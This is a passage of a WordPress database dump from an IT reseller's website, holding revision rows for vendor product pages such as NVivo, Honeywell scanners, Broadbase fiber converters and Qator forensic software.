]','Nuance','','inherit','closed','closed','','1555-revision-v1','','','2018-12-12 15:05:30','2018-12-12 07:05:30','',1555,'https://bintara.com.my/blog/2018/12/12/1555-revision-v1/',0,'revision','',0),(1917,1,'2018-12-12 15:06:24','2018-12-12 07:06:24','Next-Generation Firewall, Next-Generation Endpoint. <a href=\"https://bintara.com.my/sophos/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1840\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Sophos-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','SOPHOS','','inherit','closed','closed','','1457-autosave-v1','','','2018-12-12 15:06:24','2018-12-12 07:06:24','',1457,'https://bintara.com.my/blog/2018/12/12/1457-autosave-v1/',0,'revision','',0),(1918,1,'2018-12-12 15:08:56','2018-12-12 07:08:56','Data Backup Software on-premises, cloud-based or hybrid deployments. Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1776\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StorageCraft-Logo.png\" alt=\"\" width=\"1024\" height=\"681\" />','STORAGECRAFT','','inherit','closed','closed','','1461-autosave-v1','','','2018-12-12 15:08:56','2018-12-12 07:08:56','',1461,'https://bintara.com.my/blog/2018/12/12/1461-autosave-v1/',0,'revision','',0),(1925,1,'2018-12-12 15:21:34','2018-12-12 07:21:34','','Research-getting-published_370px-x-300px','','inherit','closed','closed','','research-getting-published_370px-x-300px','','','2018-12-12 15:21:34','2018-12-12 07:21:34','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/Research-getting-published_370px-x-300px.png',0,'attachment','image/png',0),(1924,1,'2018-12-12 15:20:13','2018-12-12 07:20:13','<h2>NVivo</h2>\r\nNVivo is the most used qualitative and mixed-methods data analysis software tool by academics and professional researchers globally. NVivo is ideal for complex research projects, whether youâ€™re working solo or in a team. Enrich your understanding with NVivo.\r\n\r\n&nbsp;\r\n<h4>Research getting published</h4>\r\nFacilitating rigorous analysis that leads to research being published\r\n<h4>PhD research</h4>\r\nHelping PhD students produce more robust research over relying on manual research methods\r\n<h4>Not-for-profit support</h4>\r\nIdentifying ways to increase the impact of not-for-profits in raising funds and awareness\r\n<h4>Public health studies</h4>\r\nAnalyzing population health to influenceÂ <em>public health</em>policy, practices and education\r\n<h4>Research grant funding</h4>\r\nRigorously backing up findings with evidence-based research to increase success of finding\r\n<h4>Finding the best minds</h4>\r\nAttracting and retaining top staff and students with the most advanced research tools\r\n\r\n&nbsp;','NVivo','','inherit','closed','closed','','1568-revision-v1','','','2018-12-12 15:20:13','2018-12-12 07:20:13','',1568,'https://bintara.com.my/blog/2018/12/12/1568-revision-v1/',0,'revision','',0),(1922,1,'2018-12-12 15:18:34','2018-12-12 07:18:34','<a href=\"https://bintara.com.my/watchguard/\">Read More...</a>\n\n<!--more-->','WATCHGUARD','','inherit','closed','closed','','1499-autosave-v1','','','2018-12-12 15:18:34','2018-12-12 07:18:34','',1499,'https://bintara.com.my/blog/2018/12/12/1499-autosave-v1/',0,'revision','',0),(1927,1,'2018-12-12 15:22:08','2018-12-12 07:22:08','','PhD-research_370px-x-300px','','inherit','closed','closed','','phd-research_370px-x-300px','','','2018-12-12 15:22:08','2018-12-12 07:22:08','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/PhD-research_370px-x-300px.png',0,'attachment','image/png',0),(1928,1,'2018-12-12 15:22:39','2018-12-12 07:22:39','','Not-for-profit-support_370px-x-300px','','inherit','closed','closed','','not-for-profit-support_370px-x-300px','','','2018-12-12 15:22:39','2018-12-12 07:22:39','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/Not-for-profit-support_370px-x-300px.png',0,'attachment','image/png',0),(1929,1,'2018-12-12 15:23:13','2018-12-12 07:23:13','','Public-health-studies_370px-x-300px','','inherit','closed','closed','','public-health-studies_370px-x-300px','','','2018-12-12 15:23:13','2018-12-12 07:23:13','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/Public-health-studies_370px-x-300px.png',0,'attachment','image/png',0),(1930,1,'2018-12-12 15:23:28','2018-12-12 07:23:28','Windows data compression tool. Read More...','WINRAR','','inherit','closed','closed','','1504-autosave-v1','','','2018-12-12 15:23:28','2018-12-12 07:23:28','',1504,'https://bintara.com.my/blog/2018/12/12/1504-autosave-v1/',0,'revision','',0),(1931,1,'2018-12-12 15:23:43','2018-12-12 07:23:43','','Research-grant-funding_370px-x-300px','','inherit','closed','closed','','research-grant-funding_370px-x-300px','','','2018-12-12 15:23:43','2018-12-12 07:23:43','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/Research-grant-funding_370px-x-300px.png',0,'attachment','image/png',0),(1932,1,'2018-12-12 15:24:16','2018-12-12 07:24:16','','Finding-the-best-minds_370px-x-300px','','inherit','closed','closed','','finding-the-best-minds_370px-x-300px','','','2018-12-12 15:24:16','2018-12-12 07:24:16','',1568,'https://bintara.com.my/wp-content/uploads/2018/12/Finding-the-best-minds_370px-x-300px.png',0,'attachment','image/png',0),(1933,1,'2018-12-12 15:24:28','2018-12-12 07:24:28','<h2>NVivo</h2>\r\nNVivo is the most used qualitative and mixed-methods data analysis software tool by academics and professional researchers globally. NVivo is ideal for complex research projects, whether youâ€™re working solo or in a team. Enrich your understanding with NVivo.\r\n\r\n<img class=\"alignnone wp-image-1925 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-getting-published_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research getting published</h4>\r\nFacilitating rigorous analysis that leads to research being published\r\n\r\n<img class=\"alignnone wp-image-1927 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PhD-research_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>PhD research</h4>\r\nHelping PhD students produce more robust research over relying on manual research methods\r\n\r\n<img class=\"alignnone wp-image-1928 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Not-for-profit-support_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Not-for-profit support</h4>\r\nIdentifying ways to increase the impact of not-for-profits in raising funds and awareness\r\n\r\n<img class=\"alignnone wp-image-1929 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Public-health-studies_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Public health studies</h4>\r\nAnalyzing population health to influenceÂ <em>public health</em>policy, practices and education\r\n\r\n<img class=\"alignnone wp-image-1931 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-grant-funding_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research grant funding</h4>\r\nRigorously backing up findings with evidence-based research to increase success of finding\r\n\r\n<img class=\"alignnone wp-image-1932 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Finding-the-best-minds_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Finding the best minds</h4>\r\nAttracting and retaining top staff and students with the most advanced research tools\r\n\r\n&nbsp;','NVivo','','inherit','closed','closed','','1568-revision-v1','','','2018-12-12 15:24:28','2018-12-12 07:24:28','',1568,'https://bintara.com.my/blog/2018/12/12/1568-revision-v1/',0,'revision','',0),(2103,1,'2018-12-13 23:30:33','2018-12-13 15:30:33','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div><img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Directory-Items/engines-subcategory-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=ECFF3E5073513CA3042CF145B73A44127F01455F\" alt=\"Engines, Readers &amp; Sub-Assembly\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li><strong>OEM Scan Engines, Decoders &amp; Modules --Â </strong>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Industries/Scanning/RFID-solutions_250-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=0F831B76FA00ACA9003C33B129373B584D2FA845\" alt=\"RFID solutions\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li><strong>RFID Solution --Â </strong>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</li>\r\n</ul>\r\nTo discover more product, please click the button below or contact us to discuss your needs.\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 23:30:33','2018-12-13 15:30:33','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2082,1,'2018-12-13 22:15:34','2018-12-13 14:15:34','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.','Microsoft','','inherit','closed','closed','','1551-revision-v1','','','2018-12-13 22:15:34','2018-12-13 14:15:34','',1551,'https://bintara.com.my/blog/2018/12/13/1551-revision-v1/',0,'revision','',0),(1934,1,'2018-12-12 15:26:55','2018-12-12 07:26:55','<h2>NVivo</h2>\r\nNVivo is the most used qualitative and mixed-methods data analysis software tool by academics and professional researchers globally. NVivo is ideal for complex research projects, whether youâ€™re working solo or in a team. Enrich your understanding with NVivo.\r\n<h3>Store and organize</h3>\r\nStore and sort all your data in one platform, from quantifiable demographic information to qualitative open-ended questions and interviews.\r\n<h3>Categorize and analyze</h3>\r\nUse powerful tools to categorize and classify your data. Automatically sort sentiment, themes and attributes in seconds. Quickly exchange data with SPSS for further statistical analysis.\r\n<h3>Visualize and discover</h3>\r\nEasily cross tabulate mixed methods data and visualize the results to brainstorm and map ideas, explore connections between project items and discover new paths of investigation.\r\n\r\n<hr />\r\n\r\n<img class=\"alignnone wp-image-1925 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-getting-published_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research getting published</h4>\r\nFacilitating rigorous analysis that leads to research being published\r\n\r\n<img class=\"alignnone wp-image-1927 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PhD-research_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>PhD research</h4>\r\nHelping PhD students produce more robust research over relying on manual research methods\r\n\r\n<img class=\"alignnone wp-image-1928 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Not-for-profit-support_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Not-for-profit support</h4>\r\nIdentifying ways to increase the impact of not-for-profits in raising funds and awareness\r\n\r\n<img class=\"alignnone wp-image-1929 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Public-health-studies_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Public health studies</h4>\r\nAnalyzing population health to influenceÂ <em>public health</em>policy, practices and education\r\n\r\n<img class=\"alignnone wp-image-1931 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Research-grant-funding_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Research grant funding</h4>\r\nRigorously backing up findings with evidence-based research to increase success of finding\r\n\r\n<img class=\"alignnone wp-image-1932 size-medium\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Finding-the-best-minds_370px-x-300px-300x243.png\" alt=\"\" width=\"300\" height=\"243\" />\r\n<h4>Finding the best minds</h4>\r\nAttracting and retaining top staff and students with the most advanced research tools\r\n\r\n[maxbutton id=\"1\" ]','NVivo','','inherit','closed','closed','','1568-revision-v1','','','2018-12-12 15:26:55','2018-12-12 07:26:55','',1568,'https://bintara.com.my/blog/2018/12/12/1568-revision-v1/',0,'revision','',0),(1935,1,'2019-03-11 17:16:35','2019-03-11 09:16:35','<a href=\"https://bintara.com.my/zoom-meetings-chat/\">Zoom Meeting</a>\n\n<a href=\"https://bintara.com.my/zoom/\">Read More...</a>\n\n<!--more-->\n\n<img class=\"alignnone wp-image-1845 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Zoom-Logo.png\" alt=\"Zoom Logo\" width=\"1024\" height=\"681\" />\n\n&nbsp;','ZOOM','','inherit','closed','closed','','1506-autosave-v1','','','2019-03-11 17:16:35','2019-03-11 09:16:35','',1506,'https://bintara.com.my/blog/2018/12/12/1506-autosave-v1/',0,'revision','',0),(1936,1,'2018-12-12 16:05:40','2018-12-12 08:05:40','Read More...\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1678\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/GoToMeeting.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','GOTOMEETING','','inherit','closed','closed','','1631-autosave-v1','','','2018-12-12 16:05:40','2018-12-12 08:05:40','',1631,'https://bintara.com.my/blog/2018/12/12/1631-autosave-v1/',0,'revision','',0),(1937,1,'2018-12-12 15:29:45','2018-12-12 07:29:45','&nbsp;\n\n<!--more-->\n\n&nbsp;','GOTOWEBINAR','','inherit','closed','closed','','1635-autosave-v1','','','2018-12-12 15:29:45','2018-12-12 07:29:45','',1635,'https://bintara.com.my/blog/2018/12/12/1635-autosave-v1/',0,'revision','',0),(1938,1,'2018-12-12 16:04:31','2018-12-12 08:04:31','&nbsp;\n\n<!--more-->\n\n<img class=\"alignnone size-full wp-image-1679\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/GoToTraining.jpg\" alt=\"\" width=\"1024\" height=\"681\" />','GOTOTRAINING','','inherit','closed','closed','','1636-autosave-v1','','','2018-12-12 16:04:31','2018-12-12 08:04:31','',1636,'https://bintara.com.my/blog/2018/12/12/1636-autosave-v1/',0,'revision','',0),(2014,1,'2018-12-12 22:49:07','2018-12-12 14:49:07','','1','','inherit','closed','closed','','1','','','2018-12-12 22:49:07','2018-12-12 14:49:07','',1632,'https://bintara.com.my/wp-content/uploads/2018/12/1.jpg',0,'attachment','image/jpeg',0),(2015,1,'2018-12-12 22:49:08','2018-12-12 14:49:08','','2','','inherit','closed','closed','','2','','','2018-12-12 22:49:08','2018-12-12 14:49:08','',1632,'https://bintara.com.my/wp-content/uploads/2018/12/2.png',0,'attachment','image/png',0),(1940,1,'2018-12-12 16:07:38','2018-12-12 08:07:38','Forensic Cooperation Analysis Tool. Read Mo','QATOR INVESTIGATOR','','inherit','closed','closed','','1425-autosave-v1','','','2018-12-12 16:07:38','2018-12-12 08:07:38','',1425,'https://bintara.com.my/blog/2018/12/12/1425-autosave-v1/',0,'revision','',0),(2016,1,'2018-12-12 22:49:10','2018-12-12 14:49:10','','3','','inherit','closed','closed','','3','','','2018-12-12 22:49:10','2018-12-12 14:49:10','',1632,'https://bintara.com.my/wp-content/uploads/2018/12/3.jpg',0,'attachment','image/jpeg',0),(2017,1,'2018-12-12 22:49:12','2018-12-12 14:49:12','','4','','inherit','closed','closed','','4','','','2018-12-12 22:49:12','2018-12-12 14:49:12','',1632,'https://bintara.com.my/wp-content/uploads/2018/12/4.jpg',0,'attachment','image/jpeg',0),(1942,1,'2018-12-12 16:12:05','2018-12-12 08:12:05','','qator_summary_new','','inherit','closed','closed','','qator_summary_new','','','2018-12-12 16:12:05','2018-12-12 08:12:05','',1575,'https://bintara.com.my/wp-content/uploads/2018/12/qator_summary_new.png',0,'attachment','image/png',0),(2018,1,'2018-12-12 22:49:13','2018-12-12 14:49:13','','5','','inherit','closed','closed','','5','','','2018-12-12 22:49:13','2018-12-12 14:49:13','',1632,'https://bintara.com.my/wp-content/uploads/2018/12/5.jpg',0,'attachment','image/jpeg',0),(1943,1,'2018-12-12 16:18:38','2018-12-12 08:18:38','Broadbase is a provider of ICT networking equipment strategically focus on LAN connectivity environment.\r\n\r\nTogether with our certified FCC, CE, ISO9001 partnering vendors who have excellent long track record internationally, we continue to provide products that consistently meet the high standard in reliability.\r\n\r\nBroadbase incorporated in year 2006 and today we are achieving toward our mission in providing products that have provenÂ its reliability and our promptness services.\r\n<p style=\"text-align: center;\"><strong>OPTICAL FIBER ETHERNET MEDIA CONVERTERS</strong></p>\r\n\r\n<table width=\"1\">\r\n<tbody>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>10/100Base-TX - 100Base-FX Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MST</td>\r\n<td>10/100Base-TX to 100Base-FX MM ST 1310nm Fiber Converter (2KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S40</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S60</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (60KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S80</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S120</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1550nm Fiber Converter (120KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MS20</td>\r\n<td>100Base-FX Multi Mode to Single Mode 2KM to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Gigabit Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (550M)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S40</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (40KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S80</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1550nm Fiber Converter (80KM)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SFP</td>\r\n<td>10/100/1000Base-T to SFP Slot</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1000MS20</td>\r\n<td>1000Base-SX/LX Multi Mode to Single Mode 550M to 20KM Converter</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Chassis for Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-14S-1100SA</td>\r\n<td>14 Slots 10/100Base-TX or 10/100/1000Base-T c/w Dual Power Fiber Converters Chassis (for stand alone type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-16S-110CT</td>\r\n<td>16 Slots 10/100Base-TX c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-17S-1100CT</td>\r\n<td>17 Slots 10/100Base/1000Base-T c/w Dual Power Fiber Converters Chassis (for card type)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>POE+ Media Converters</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX MM SC 1310nm Fiber Converter (2KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MSC-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-SX MM SC 850nm Fiber Converter (500M) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-AT30</td>\r\n<td>10/100Base-TX to 100Base-FX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100S20-AT30</td>\r\n<td>10/100/1000Base-T to 1000Base-LX SM SC 1310nm Fiber Converter (20KM) POE+ IEEE802.3at/af (25.5Watts)</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;\" colspan=\"2\"><strong>Industrial Media Converters (DIN Rail, Dual Input Power 12-48V)</strong></td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100MSC-IDG</td>\r\n<td width=\"617\">1-Port 10/100M, 1-Port 100FX SC Fiber Multi Mode 1310nm 2km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-100S20-IDG</td>\r\n<td>1-Port 10/100M, 1-Port 100FX SC Fiber Single Mode 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100MLC-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Multi Mode, 850nm, 0.5km Industrial Converter</td>\r\n</tr>\r\n<tr>\r\n<td>BMC-1100SL20-IDG</td>\r\n<td>1-Port 10/100/1000M, 1-Port 1000SFP Fiber Single Mode, 1310nm, 20km Industrial Converter</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"10\" ]','Broadbase','','publish','closed','closed','','broadbase','','','2018-12-21 16:16:29','2018-12-21 08:16:29','',0,'https://bintara.com.my/?page_id=1943',0,'page','',0),(1944,1,'2018-12-12 16:18:20','2018-12-12 08:18:20','<a href=\"https://bintara.com.my/broadbase/\">Read More...</a>','BROADBASE','','private','closed','closed','','broadbase','','','2019-09-23 10:21:32','2019-09-23 02:21:32','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1944',0,'portfolio','',0),(1945,1,'2018-12-12 16:18:38','2018-12-12 08:18:38','','Broadbase','','inherit','closed','closed','','1943-revision-v1','','','2018-12-12 16:18:38','2018-12-12 08:18:38','',1943,'https://bintara.com.my/blog/2018/12/12/1943-revision-v1/',0,'revision','',0),(1948,1,'2018-12-12 16:24:01','2018-12-12 08:24:01','','Qator_big','','inherit','closed','closed','','qator_big','','','2018-12-12 16:24:01','2018-12-12 08:24:01','',1575,'https://bintara.com.my/wp-content/uploads/2018/12/Qator_big.png',0,'attachment','image/png',0),(1947,1,'2018-12-12 16:19:46','2018-12-12 08:19:46','<h3>Qator Enterpriseâ„¢</h3>\r\n<h4>Remote Forensic Analysis &amp; Security Incident Management Solution</h4>\r\n<ul>\r\n 	<li>Forensic investigation function</li>\r\n 	<li>Investigate confidential information breach</li>\r\n 	<li>Check important information distribution</li>\r\n 	<li>Collect various information from client</li>\r\n</ul>\r\n<h4>Summary</h4>\r\n<ul>\r\n 	<li>Qator Enterprise allows users to efficiently track down information and inspect systems in case of information breach.</li>\r\n 	<li>It allows users to prevent breaches by analyzing target PCs via remote inspection.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-1942\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator_summary_new.png\" alt=\"\" width=\"700\" height=\"167\" />\r\n<h4>Forensics</h4>\r\n<ul>\r\n 	<li>Search and analyze files</li>\r\n 	<li>Restore deleted data</li>\r\n 	<li>Time-series analysis</li>\r\n 	<li>Internet/email analysis</li>\r\n 	<li>Evidence imaging</li>\r\n 	<li>DRM document analysis</li>\r\n</ul>\r\n<h4>Data Collection</h4>\r\n<ul>\r\n 	<li>Periodic data collection</li>\r\n 	<li>Volatile data collection</li>\r\n 	<li>Remote inspection</li>\r\n 	<li>PC screen image collection</li>\r\n</ul>\r\n<h4>Remote Inspection</h4>\r\n<ul>\r\n 	<li>Inspect file use</li>\r\n 	<li>Inspect PC screen</li>\r\n 	<li>Set up security management policy</li>\r\n 	<li>Create report</li>\r\n</ul>','Qator Enterprise','','inherit','closed','closed','','1575-revision-v1','','','2018-12-12 16:19:46','2018-12-12 08:19:46','',1575,'https://bintara.com.my/blog/2018/12/12/1575-revision-v1/',0,'revision','',0),(1950,1,'2018-12-12 16:24:20','2018-12-12 08:24:20','<h3>Qator Enterpriseâ„¢</h3>\r\n<h4><img class=\"alignnone wp-image-1948 size-full\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Qator_big.png\" alt=\"\" width=\"239\" height=\"300\" /></h4>\r\n<h4>Remote Forensic Analysis &amp; Security Incident Management Solution</h4>\r\n<ul>\r\n 	<li>Forensic investigation function</li>\r\n 	<li>Investigate confidential information breach</li>\r\n 	<li>Check important information distribution</li>\r\n 	<li>Collect various information from client</li>\r\n</ul>\r\n<h4>Summary</h4>\r\n<ul>\r\n 	<li>Qator Enterprise allows users to efficiently track down information and inspect systems in case of information breach.</li>\r\n 	<li>It allows users to prevent breaches by analyzing target PCs via remote inspection.</li>\r\n</ul>\r\n<img class=\"alignnone size-full wp-image-1942\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/qator_summary_new.png\" alt=\"\" width=\"700\" height=\"167\" />\r\n<h4>Forensics</h4>\r\n<ul>\r\n 	<li>Search and analyze files</li>\r\n 	<li>Restore deleted data</li>\r\n 	<li>Time-series analysis</li>\r\n 	<li>Internet/email analysis</li>\r\n 	<li>Evidence imaging</li>\r\n 	<li>DRM document analysis</li>\r\n</ul>\r\n<h4>Data Collection</h4>\r\n<ul>\r\n 	<li>Periodic data collection</li>\r\n 	<li>Volatile data collection</li>\r\n 	<li>Remote inspection</li>\r\n 	<li>PC screen image collection</li>\r\n</ul>\r\n<h4>Remote Inspection</h4>\r\n<ul>\r\n 	<li>Inspect file use</li>\r\n 	<li>Inspect PC screen</li>\r\n 	<li>Set up security management policy</li>\r\n 	<li>Create report</li>\r\n</ul>','Qator Enterprise','','inherit','closed','closed','','1575-revision-v1','','','2018-12-12 16:24:20','2018-12-12 08:24:20','',1575,'https://bintara.com.my/blog/2018/12/12/1575-revision-v1/',0,'revision','',0),(2041,1,'2019-09-30 16:11:16','2019-09-30 08:11:16','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\n\n<h2 class=\"section-header__headline\">Understand your audience</h2>\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\n</ul>\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\n</ul>\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\n</ul>\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\n&nbsp;\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\n</ul>\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\n<ul>\n 	<li class=\"icon-text__title arrow\"><strong>Student 